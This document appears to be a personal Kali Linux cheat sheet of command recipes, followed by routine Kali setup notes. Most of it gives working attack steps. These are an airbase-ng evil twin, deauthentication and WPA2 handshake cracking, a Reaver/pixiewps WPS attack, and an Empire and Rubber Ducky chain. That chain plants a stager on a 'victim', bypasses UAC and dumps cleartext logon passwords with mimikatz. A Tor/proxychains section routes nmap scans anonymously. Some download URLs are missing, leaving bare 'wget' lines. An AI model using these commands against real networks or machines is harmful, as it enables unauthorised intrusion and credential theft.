Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng wlan0mon -c 11 -a 20:34:67:24:89:76  -e FakeAP -v -z 2

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11-Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rougueap


  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon


  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt rougue-01.cap

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill ( If wifi interface doesn’t show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap mon0
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap mon0 (Alternative method)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3(Client MAC address) mon0
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4c. (Empire: agents) > interact FSDFSGAJ34FGH4
4d. (Empire: FSDFSGAJ34FGH4 ) > sysinfo
4e. (Empire: FSDFSGAJ34FGH4 ) > usemodule privesc/bypassuac
4f. (Empire: privesc/bypassuac ) > set Listener Listener01
4g. (Empire: privesc/bypassuac ) > run 
4h. (Empire: privesc/bypassuac ) > back * 2
4i. (Empire: agents) > list
4j. (Empire: agents) > interact DSGHFDFSGHJ243J
4k. (Empire: DSGHFDFSGHJ243J ) > usemodule credentials/
4l. (Empire: credentials/mimikatz/logonpasswords ) > run

If succesful, logon passwords are now revealed in 
cleartext :)

Tor + proxychains + Kali

  1. Update Kali
    1. apt-get update
  2. Configure apt sources
    1. leafpad /etc/apt/sources.list
      1. add ‘deb wheezy main’
  3. Install Tor gpg keys
    1. gpg –keyserver –recv 886DDD89
    2. gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add –
    3. apt-get update
    4. apt-get install
  4. Install Tor
    1. apt-get install tor
  5. Configure proxychains
    1. leafpad /etc/proxychains.conf
      1. uncomment ‘dynamic_chain’
      2. comment out ‘static_chain’
      3. add ‘socks5 9050’ at the end of the file
  6. Start Tor
    1. service tor start
  7. Execute proxychains
    1. proxychains nmap

Aircrack-ng + reaver + pixiewps


  • Kali Linux
  • Do a “apt-get update && apt-get dist-upgrade -y” in your Kali Linux machine

1) Install reaver

r0ot@kali:~# apt-get install reaver aircrack-ng

2) Put your interface in monitor mode:

ro0t@kali:~# airmon-ng start wlan0

Note: You should now have a monitor interface named ‘wlan0mon

3) Identify AP in-scope for testing

ro0t@kali:~# airodump-ng wlan0mon –wps

Note: Identify in-scope AP mac address(BSSID) & channel it runs out of

4) Run reaver with gathered info 

roth@kali:~#  reaver -i wlan0mon -c 11 -b 12:34:56:78:90:12 -K 1

5) Behold pixiewps magic

You’re presented with WPS PSK wihin seconds, thanks Kali, reaver & pixiewps …that’s what a call an alliance of power

Scripts :: Kali


KAAISv3 by rawstring

  • wget v4.3 by peterubuntu10

  • wget

Lazy Kali

  • wget
  • wget by

  • svn checkout phillips321 by Lee Baird

  • git clone

1st setup :: Kali


Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb kali main non-free contrib
deb kali/updates main contrib non-free

Bleeding Edge repos
deb kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
3. mount VBoxAdditions package
4. copy install package ( to /tmp
5. chmod 755 /tmp/
6. ./
7. logout or reboot guest machine


  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot


Kali Pi :: Initial Setup



[Static IP]
nano /etc/network/interfaces

Add following lines at the bottom of the file(comment out above lines except loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static

[DNS Conf]
nano /etc/resolv.conf

[Assign static default gateway]
ip route add default via

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status


– TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]

– Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable


Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable

XFCE on Kali


apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies

Configure default x-session mngr
update-alternatives –config x-session-manager

apt-get remove xfce4 xfce4-places-plugin xfce4-goodies

Fix “Warning: gnome-keyring…” error
Edit /etc/xdg/autostart/gnome-keyring-pkcs11.desktop
and add ‘XFCE’ at the end of the OnlyShowIn line.